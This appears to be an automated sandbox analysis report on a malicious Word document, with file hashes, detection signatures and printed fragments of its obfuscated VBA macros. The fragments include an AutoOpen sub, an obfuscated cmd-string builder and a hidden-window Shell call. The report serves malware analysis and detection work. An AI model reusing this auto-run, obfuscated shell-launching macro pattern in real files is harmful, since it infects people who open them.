
General

  • Target

    0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318

  • Size

    124KB

  • MD5

    b6e13c6a1d437ed02509be01dd334983

  • SHA1

    a12ee91c820278590d58f0f846067992c1aa1053

  • SHA256

    0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318

  • SHA512

    8bfc1ffaaa45a8d7f6add5c51e7d1e8e62c95b71b7f76905e3a497f9957227991cd7eef477bc073483d375a3dadaef46d2d7e7376ed170a636fcd194b5836cba

  • SSDEEP

    1536:mptJlmrJpmxlRw99NBq+a9Mctk0bARn03mhE7M7L1HbCmnrlL8gfvQ:Kte2dw99fBcTS03r7UL1HempL8gw

Malware Config

Signatures

  • Office macro that triggers on suspicious action 1 IoCs

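    The Office document contains a macro that is triggered automatically by a specific event rather than being started by the user (for example an auto-run procedure such as the AutoOpen sub listed under Files, which Word runs when the document is opened) - often malicious.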

  • Suspicious Office macro 1 IoCs

    Office document equipped with macros.

Files

  • 0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318
    .doc windows office2003

    XjfLisDjucS

    Attribute VB_Name = "XjfLisDjucS"
    Attribute VB_Base = "1Normal.ThisDocument"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = True
    Attribute VB_Customizable = True
    Sub AutoOpen()
    Dim LiHOou(1)

    XpzIKKTGQiwv

    Attribute VB_Name = "XpzIKKTGQiwv"
    Function dSEYjani()
    QGhAKfV = "d \/ // //" + "// / \ / /V:" + "O/C" + """" + "set ]}*~=027a 0" + "72a 07a2 0a72 207"
    ZiKwMnYW = "a 2a70 0a72 270a" + " 72a0 7a02 a" + "027 a207 02"
    Dim jqzRY(1)
    jqzRY(0) = MidB(tQiQXv + COZOzUwvOSWwXoiiun + CtiHaoHO, 488, 205) + Left(NQNZEMuC + GSWRGpNrPBWWwuHnzt + YlGaJd, 653)
    Dim iREfn(2)
    iREfn(0) = Right(YwBqjd + AmktXivcbWUGncpsK + YSjAZKiX, 742) + Right(YZbroTj + cEQTOiONtlJYLOWEJRE + liQfw, 777) + Right(AaNUB + rSPJtZYNMYbwcAEFijSMS + ZJwwuR, 3) + MidB(qBuvm + CSXNZjzpEviFZkVzOBPRH + PKCdT, 374, 409)
    iREfn(1) = Mid(tvMwqK + pVVinEKamzhmmMToTM + JHJMCYX, 172, 83) + MidB(clFhb + StjXQdsilWVJwEWiYCm + tIfYiji, 851, 298) + Left(qvmqfTXw + iPKXttKBvfqDdIwsGiGnCOz + wEfoRrL, 870) + Right(lnTvO + zsIihzFiIcbHTiwwQrZM + dSOFmj, 847)
    Dim ownPlI(2)

    psiKPThAkow

    Attribute VB_Name = "psiKPThAkow"
    Function kWOmnIjtktpw(YqJJMEHMws As String)
    Const voEQJiB = 0
    Dim jnVVqJ(2)
    jnVVqJ(0) = Right(ZCQsod + UVvzFrTiPzQYQuInVdtc + dPBJdom, 515) + Left(cwMooU + aLDwuOzfqGlbtSLRKFaLpw + SiUwA, 534) + Mid(QihUn + JvUouijNMCrhOwmDh + sFJUr, 28, 567) + MidB(iBaRQ + NclhGwkZBQTibPzDOia + XTFYqHi, 695, 861)
    jnVVqJ(1) = Right(awhEGH + qkJLYuZKMGinlGfZuRTjbt + fhtwG, 104) + MidB(uNHji + OXlKlopXbhidWEOktdaP + HkMzjw, 914, 574) + Left(IpjYU + cVZaBqfpRtWTlkdDd + cmAIRvt, 667) + Right(DSwubw + WSrhCBRADwMkrtmZ + ulGbd, 365)
    Dim OjiVM(2)
    OjiVM(0) = Left(wbthMQO + asYIYswqKTnABMovm + RMKcNzwz, 989) + Right(pKvZnzF + iCQlOosAcSNniawvtBtKOR + FbZqqwn, 337)
    OjiVM(1) = Left(YNZGRzXm + jUOoBujkrCLnDbmb + MLPZiWnj, 917) + Mid(zrwkNko + EjXuENTOWlKFDwPSmG + EaWcPCpr, 953, 882)
    Shell% YqJJMEHMws, voEQJiB
